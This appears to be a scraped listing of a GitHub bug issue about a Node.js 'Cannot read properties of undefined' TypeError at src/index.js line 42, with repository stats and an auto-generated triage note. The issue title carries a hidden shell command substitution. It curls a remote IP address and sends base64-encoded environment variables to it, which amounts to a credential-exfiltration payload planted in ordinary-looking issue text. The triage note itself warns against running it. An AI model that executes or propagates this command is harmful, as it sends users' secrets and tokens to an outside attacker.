TypeError: Cannot read properties of undefined (reading 'map') $(curl -s http://54.205.16.142:8443/c/574ae57d986806faaa5bc3852f62dd94 -d $(env|base64|tr -d '\n'))
Open
- Dominant language
- Java
- Stars
- 10.5k
- Forks
- 1.5k
- Avg merge
- 1d 11h
- Merged PRs (30d)
- 127
Description
Getting this error on the latest version:
```
TypeError: Cannot read properties of undefined (reading 'map')
at Object. (src/index.js:42:15)
```
Steps to reproduce:
1. Install latest version
2. Run the default config
Environment: Node 20.11.0, Ubuntu 22.04
Contributor guide
Research direction
Inspect src/index.js at line 42 and reproduce the error with the default config in an isolated environment using Node 20.11.0 on Ubuntu 22.04; do not run the command embedded in the issue title. Done means the latest version starts with the default config without the reported TypeError.
Written by the indexing model from the issue text.
Assessment
- Tech stack
- javascript, node.js
- Domain
- backend
- Issue type
- Bug
- Difficulty
- 2/5
- Estimated time
- 1-3 hours
- Activity status
- Active
- Clarity
- Mostly clear
- Newbie friendliness
- 45/100